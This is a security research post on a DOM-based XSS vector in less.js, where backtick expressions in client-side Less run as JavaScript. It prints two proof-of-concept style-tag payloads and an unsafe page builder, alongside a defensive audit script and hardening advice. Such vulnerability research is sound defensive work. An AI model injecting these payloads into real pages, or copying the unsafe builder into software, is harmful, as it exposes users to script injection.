XSS attack vector in the "style" context for less.js


detail

Less and Sass came to mind while I was researching CSS injection attacks. Both are CSS pre-processors, so I assumed they did not support any client-side operation. That was a mistake...

I came across less.js while visiting http://lesscss.org/. less.js can evaluate JavaScript placed between backtick characters in Less code, so a DOM-based XSS vulnerability arises at this point: any attacker-controlled text that ends up inside a Less stylesheet compiled by less.js in the browser can smuggle in a backtick expression and have it executed as JavaScript. One caveat for testers: since Less 3.0 this inline JavaScript evaluation is disabled by default (the javascriptEnabled option), so whether the vector works depends on the less.js version and configuration the target page loads.

I published it on Twitter as a new attack vector for Less.


shortening

Also, thanks to Rakesh Mane for the shortening!


payloads

less.js picks up inline stylesheets by testing the type attribute of each style element against this regex (note that it is case-sensitive):

var t=/^text\/(x-)?less$/;

So both of these payloads are compiled by less.js, and the backtick expression runs as JavaScript:

<style type='text/less'>x{x:`alert(1)`}</style>
<style type='text/x-less'>x{x:`alert(1)`}</style>
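The following is an added example, not code from the original writeup or from less.js. It reuses only the type-attribute regex quoted above; the function names, the sample HTML, and the "theme" page builder are constructed for this example. It shows which inline style blocks less.js would pick up, flags the backtick JavaScript-evaluation syntax inside them (ignoring backticks in Less comments), and contrasts a page that splices user input into a Less block with one that validates the input strictly before it can reach the Less source.

```javascript
// Added example (not part of the original post or of less.js).
// LESS_TYPE_RE is the regex quoted from less.js; everything else here is
// constructed for illustration.

// The type-attribute regex quoted from less.js (case-sensitive, as in the source).
const LESS_TYPE_RE = /^text\/(x-)?less$/;

// Rough <style ...>...</style> matcher; the attribute string is parsed separately.
const STYLE_RE = /<style\b([^>]*)>([\s\S]*?)<\/style>/gi;
const TYPE_ATTR_RE = /\btype\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i;

// Would less.js compile this element? Assumption: a style element with no
// type attribute is plain CSS and is left alone by less.js.
function isLessStyle(attrs) {
  const m = TYPE_ATTR_RE.exec(attrs);
  if (!m) return false;
  const type = m[1] ?? m[2] ?? m[3];
  return LESS_TYPE_RE.test(type);
}

// Strip /* */ and // comments so a backtick inside a comment is not reported.
// Simplification (assumption): quoted strings are not tracked, so "//" inside
// a url() or a string would also be treated as a comment start.
function stripLessComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '').replace(/\/\/[^\n]*/g, '');
}

// Return every backtick-delimited expression in a Less source, i.e. the
// places where less.js would evaluate JavaScript.
function findBacktickEval(lessSource) {
  const found = [];
  const re = /`([^`]*)`/g;
  const cleaned = stripLessComments(lessSource);
  let m;
  while ((m = re.exec(cleaned)) !== null) found.push(m[1]);
  return found;
}

// Scan an HTML document and report Less blocks that contain backtick eval.
function auditHtml(html) {
  const findings = [];
  STYLE_RE.lastIndex = 0;
  let m;
  while ((m = STYLE_RE.exec(html)) !== null) {
    const [, attrs, body] = m;
    if (!isLessStyle(attrs)) continue;
    for (const js of findBacktickEval(body)) {
      findings.push({ js, snippet: body.trim() });
    }
  }
  return findings;
}

// Constructed sample page: the two payloads from the post, a plain CSS block
// with the same body, and an untyped block whose backticks sit in a comment.
const SAMPLE_HTML =
  "<p>hello</p>\n" +
  "<style type='text/less'>x{x:`alert(1)`}</style>\n" +
  "<style type='text/x-less'>x{x:`alert(1)`}</style>\n" +
  "<style type='text/css'>x{x:`alert(1)`}</style>\n" +
  "<style>/* `not evaluated` */ p{color:red}</style>";

// Constructed vulnerable page builder: a user-supplied colour is spliced
// straight into an inline Less block that less.js compiles client-side.
function buildThemeBlockUnsafe(userColor) {
  return '<style type="text/less">@accent: ' + userColor +
    '; a { color: @accent; }</style>';
}

// Hardened version: only a strict hex colour is accepted, so neither a
// backtick nor anything else attacker-controlled can reach the Less source.
const HEX_COLOR_RE = /^#[0-9a-fA-F]{6}$/;
function buildThemeBlockSafe(userColor) {
  if (!HEX_COLOR_RE.test(userColor)) throw new Error('invalid colour');
  return '<style type="text/less">@accent: ' + userColor +
    '; a { color: @accent; }</style>';
}

// Usage: auditHtml(SAMPLE_HTML) reports the two Less blocks and skips the rest.
console.log(JSON.stringify(auditHtml(SAMPLE_HTML), null, 2));
console.log(auditHtml(buildThemeBlockUnsafe('#fff; x{x:`alert(1)`}')).length, 'finding(s) in unsafe page');
console.log(auditHtml(buildThemeBlockSafe('#ff0000')).length, 'finding(s) in safe page');
```

The checker is a static approximation of what less.js does, not a reimplementation of its parser; its value is in spotting pages where untrusted data can reach a text/less or text/x-less block at all. The real fix on the application side is the one the hardened builder shows: never let free-form user input into a Less source that is compiled in the browser, and keep javascriptEnabled off in less.js so a backtick that does slip through is not evaluated.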